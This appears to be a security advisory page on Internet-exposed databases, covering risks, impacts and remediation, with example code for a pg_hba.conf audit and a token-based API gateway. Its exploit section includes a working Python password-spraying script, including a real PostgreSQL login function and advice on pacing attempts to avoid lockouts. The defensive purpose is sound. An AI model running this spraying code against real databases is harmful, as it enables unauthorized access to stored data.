Database publicly exposed

Context

Exposing a database directly to the Internet is insecure by design:
  • Authentication by username/password alone is weak and exposed to brute-force and password-spraying attacks, and adding a second authentication factor to the database protocol itself is hard.
  • Some databases support TLS on the wire, but it is often optional or disabled by default, so traffic can be intercepted.
  • Denial of Service (DoS) attacks are easy to perform against a listener that anyone can reach.
  • User management is cumbersome, so many organizations use a single shared account for all access to the database.
  • Security patches are not trivial to install, so known vulnerabilities stay reachable for a long time.


Impacted Assets

The data stored in the database, and possibly the underlying server.

If an attacker guesses a valid password and logs in to the database, they can read and modify the stored data and may be able to pivot to the server hosting the database, since several engines expose file access or command-execution features to privileged accounts.
 

Exploit or command to run

A brute-force script for any given database protocol is easy to write; the hard part is guessing a valid user/password pair.
Depending on the engine, default administrative accounts usually exist (for example root on MySQL or postgres on PostgreSQL), and these are the first targets.
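As an added example (not from the original page), the spraying loop described above, written in Python. The default-account table and the target credential set are constructed for the example; postgres_attempt shows how the same loop would drive a real PostgreSQL login through psycopg2 (assumed installed; it is not called by the demo), while fake_authenticator stands in for it so the script runs offline.

```python
import time
from typing import Callable, Dict, Iterable, List, Tuple

# Default / well-known administrative accounts per engine. Constructed list
# for this example: these are account names the engines ship with, and an
# exposed instance frequently still has them enabled.
DEFAULT_ACCOUNTS = {
    "postgresql": ["postgres"],
    "mysql": ["root", "mysql"],
    "mssql": ["sa"],
    "mongodb": ["admin", "root"],
}


def spray(attempt: Callable[[str, str], bool],
          users: Iterable[str],
          passwords: Iterable[str],
          delay: float = 0.0,
          stop_on_success: bool = False) -> Tuple[List[Tuple[str, str]], int]:
    """Password spraying: try ONE password against every user before moving
    on to the next password. Each account sees few failures per round, which
    is what separates spraying from per-user brute force and why a lockout
    policy alone does not stop it. `attempt(user, password)` returns True on
    a successful login; it is injected so the loop can drive any client."""
    users = list(users)
    found: List[Tuple[str, str]] = []
    tried = 0
    for password in passwords:
        for user in users:
            tried += 1
            if attempt(user, password):
                found.append((user, password))
                if stop_on_success:
                    return found, tried
            if delay:
                time.sleep(delay)  # pace the attempts to stay under thresholds
    return found, tried


def postgres_attempt(host: str, port: int = 5432) -> Callable[[str, str], bool]:
    """Real attempt function for PostgreSQL. Requires psycopg2 (assumption);
    imported lazily so the rest of the example runs without it."""
    def attempt(user: str, password: str) -> bool:
        import psycopg2
        try:
            psycopg2.connect(host=host, port=port, user=user, password=password,
                             dbname="postgres", connect_timeout=5).close()
            return True
        except psycopg2.OperationalError:
            return False
    return attempt


def fake_authenticator(valid: Dict[str, str]) -> Callable[[str, str], bool]:
    """Offline stand-in for a real connection attempt. `valid` is a
    constructed user -> password table representing the target's accounts."""
    def attempt(user: str, password: str) -> bool:
        return valid.get(user) == password
    return attempt


def demo_spray() -> Tuple[List[Tuple[str, str]], int]:
    # Constructed target: the postgres default account was left with a
    # trivial password and an application account uses a seasonal one.
    target = fake_authenticator({"postgres": "postgres", "app": "Summer2024!"})
    users = DEFAULT_ACCOUNTS["postgresql"] + ["app", "admin"]
    passwords = ["postgres", "password", "Summer2024!"]
    return spray(target, users, passwords)


if __name__ == "__main__":
    hits, attempts = demo_spray()
    print(f"{attempts} attempts, valid credentials: {hits}")
```

Running demo_spray() finds both weak accounts in nine attempts. Swapping fake_authenticator for postgres_attempt("db.example.com") turns the same loop into a live test against a reachable listener, which is exactly why an exposed database should never rely on passwords alone.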
 

Consequences

Cyber-terms

Direct impact on the confidentiality, integrity, availability and traceability of the information stored in the database.
 

Managerial terms

A successful login causes indirect losses for the company, since backups must be restored to recover lost or modified data, on top of the direct loss of the data's confidentiality.
 

Remediation

Short term

In the short term we recommend placing a firewall in front of the database that allowlists only the IP addresses authorized to connect and drops everything else, and restricting the database's own host-based access rules to the same ranges so the two controls agree.
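As an added check (not from the original page), a Python audit of PostgreSQL's host-based access file, pg_hba.conf, which is the database-side counterpart of the firewall allowlist: the firewall should drop everything outside the allowed ranges, and pg_hba.conf should not grant more than those same ranges. The page does not mention pg_hba.conf; choosing it as the example is this block's assumption, and the sample file and allowlist are constructed. The same review applies to other engines' host patterns, such as MySQL accounts granted to 'user'@'%'.

```python
import ipaddress

# Constructed pg_hba.conf excerpt: the first two rules are sensible, the
# remaining ones are the patterns an Internet-exposed server typically has.
SAMPLE_PG_HBA = """
# TYPE    DATABASE  USER      ADDRESS            METHOD
local     all       all                          peer
hostssl   all       all       10.20.30.0/24      scram-sha-256
host      all       all       0.0.0.0/0          md5
host      all       all       ::/0               md5
hostnossl all       all       203.0.113.0/24     password
host      all       postgres  198.51.100.7/32    trust
"""

WEAK_METHODS = {"trust", "password"}   # no credential check / cleartext password


def parse_pg_hba(text):
    """Parse pg_hba.conf into dicts. Handles 'local' rules (no address),
    CIDR addresses, the older 'ADDRESS NETMASK' two-column form and
    keywords/hostnames (kept as-is)."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        f = line.split()
        rule = {"type": f[0], "database": f[1], "user": f[2], "line": " ".join(f)}
        if f[0] == "local":
            rule["address"], rule["method"] = None, f[3]
        elif "/" in f[3] or f[3] in ("all", "samehost", "samenet"):
            rule["address"], rule["method"] = f[3], f[4]
        else:
            try:  # 'ADDRESS NETMASK' two-column form
                ipaddress.ip_address(f[4])
                rule["address"], rule["method"] = f"{f[3]}/{f[4]}", f[5]
            except (ValueError, IndexError):  # hostname or other keyword
                rule["address"], rule["method"] = f[3], f[4]
        rules.append(rule)
    return rules


def audit_pg_hba(text, allowlist):
    """Flag rules that let the whole Internet reach the database, that are
    wider than the firewall allowlist, or that use a weak auth method.
    Returns (normalized rule line, reason) pairs."""
    allowed = [ipaddress.ip_network(c) for c in allowlist]
    findings = []
    for r in parse_pg_hba(text):
        if r["address"] is None:
            continue  # Unix-socket rule, not reachable over the network
        if r["method"] in WEAK_METHODS:
            findings.append((r["line"], f"weak auth method '{r['method']}'"))
        if r["type"] == "hostnossl":
            findings.append((r["line"], "explicitly disables TLS"))
        if r["address"] == "all":
            findings.append((r["line"], "address 'all' matches any client"))
            continue
        try:
            net = ipaddress.ip_network(r["address"], strict=False)
        except ValueError:
            continue  # samehost/samenet keyword or hostname, not checked here
        if net.prefixlen == 0:
            findings.append((r["line"], "matches the entire Internet"))
        elif not any(net.version == a.version and net.subnet_of(a) for a in allowed):
            findings.append((r["line"], "wider than the firewall allowlist"))
    return findings


def demo_audit():
    # Constructed allowlist: the ranges the firewall is supposed to permit.
    return audit_pg_hba(SAMPLE_PG_HBA, ["10.20.30.0/24", "198.51.100.7/32"])


if __name__ == "__main__":
    for line, reason in demo_audit():
        print(f"{reason:40s} <- {line}")
```

Run it against the real file (usually next to postgresql.conf in the data directory) with the CIDRs your firewall permits; any finding means the database trusts a wider set of clients than the network does.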
 

Mid-term

Database access should be mediated by a public API rather than by exposing the database protocol itself.
The API connects, preferably behind a WAF, back to the database. It issues tokens that carry specific rights (for example access to particular database views) and a limited lifetime; these are easy to revoke, and when configured correctly the database itself is no longer reachable from outside.
The API is also easy to secure with TLS, IP allowlisting, MFA and controls such as locking a client out after a number of failed attempts.
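As an added example (not the page's code), a minimal Python gateway implementing the controls just listed: password-authenticated API users, tokens bound to one database view with an expiry, revocation, and a per-client lockout after repeated failures. The customers table, the two views and the "reporting" account are constructed for the demo and run on an in-memory SQLite database; the threshold and lockout duration are illustrative values, and a real deployment would sit behind TLS and a WAF as described above.

```python
import hashlib
import hmac
import secrets
import sqlite3
import time

LOCKOUT_THRESHOLD = 5         # failed logins from one client before lockout (example value)
LOCKOUT_SECONDS = 15 * 60     # how long the client stays locked out (example value)


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


class DatabaseGateway:
    """Hypothetical API in front of the database. Clients never hold database
    credentials: the gateway owns the single connection and hands out
    short-lived tokens, each bound to exactly one view."""

    def __init__(self, conn, api_users):
        self.conn = conn
        self.api_users = api_users     # user -> {"salt", "hash", "views"}
        self.tokens = {}               # token -> {"user", "view", "expires"}
        self.failures = {}             # client_ip -> consecutive failures
        self.locked_until = {}         # client_ip -> unix time

    def login(self, user, password, client_ip, view, ttl=300, now=None):
        """Return a token granting read access to `view` for `ttl` seconds,
        or None. Failures are counted per client and trigger a temporary
        lockout; the database itself never sees the attempt."""
        now = time.time() if now is None else now
        if self.locked_until.get(client_ip, 0) > now:
            return None
        acct = self.api_users.get(user)
        ok = acct is not None and hmac.compare_digest(
            hash_password(password, acct["salt"]), acct["hash"])
        if not ok:
            self.failures[client_ip] = self.failures.get(client_ip, 0) + 1
            if self.failures[client_ip] >= LOCKOUT_THRESHOLD:
                self.locked_until[client_ip] = now + LOCKOUT_SECONDS
                self.failures[client_ip] = 0
            return None
        self.failures.pop(client_ip, None)
        if view not in acct["views"]:
            return None  # authenticated, but not entitled to that view
        token = secrets.token_urlsafe(32)
        self.tokens[token] = {"user": user, "view": view, "expires": now + ttl}
        return token

    def revoke(self, token):
        return self.tokens.pop(token, None) is not None

    def query(self, token, now=None):
        """Run the only query a token permits: SELECT * on its bound view.
        The view name comes from the server-side allowlist, never from the
        client, so quoting it as an identifier is safe."""
        now = time.time() if now is None else now
        grant = self.tokens.get(token)
        if grant is None:
            return None
        if grant["expires"] <= now:
            del self.tokens[token]  # expired: drop it and refuse
            return None
        view = grant["view"].replace('"', '""')
        return self.conn.execute(f'SELECT * FROM "{view}"').fetchall()


def build_demo():
    """Constructed in-memory database with two views of differing sensitivity
    and one API account that may only read the non-sensitive one."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE customers(id INTEGER, name TEXT, email TEXT, card_last4 TEXT);
        INSERT INTO customers VALUES (1, 'Ada', 'ada@example.com', '4242'),
                                     (2, 'Linus', 'linus@example.com', '0005');
        CREATE VIEW v_names   AS SELECT id, name FROM customers;
        CREATE VIEW v_billing AS SELECT id, card_last4 FROM customers;
    """)
    salt = secrets.token_bytes(16)
    api_users = {"reporting": {"salt": salt,
                               "hash": hash_password("correct horse", salt),
                               "views": {"v_names"}}}
    return DatabaseGateway(conn, api_users)


if __name__ == "__main__":
    gw = build_demo()
    tok = gw.login("reporting", "correct horse", "198.51.100.9", "v_names", ttl=60)
    print(gw.query(tok))
    gw.revoke(tok)
    print(gw.query(tok))
```

The point of the design is that the only thing reachable from the Internet is the gateway: a spraying tool now hits a per-client lockout instead of the database listener, a leaked token exposes one view for a few minutes rather than a standing database account, and revoking access is a dictionary delete instead of a password rotation.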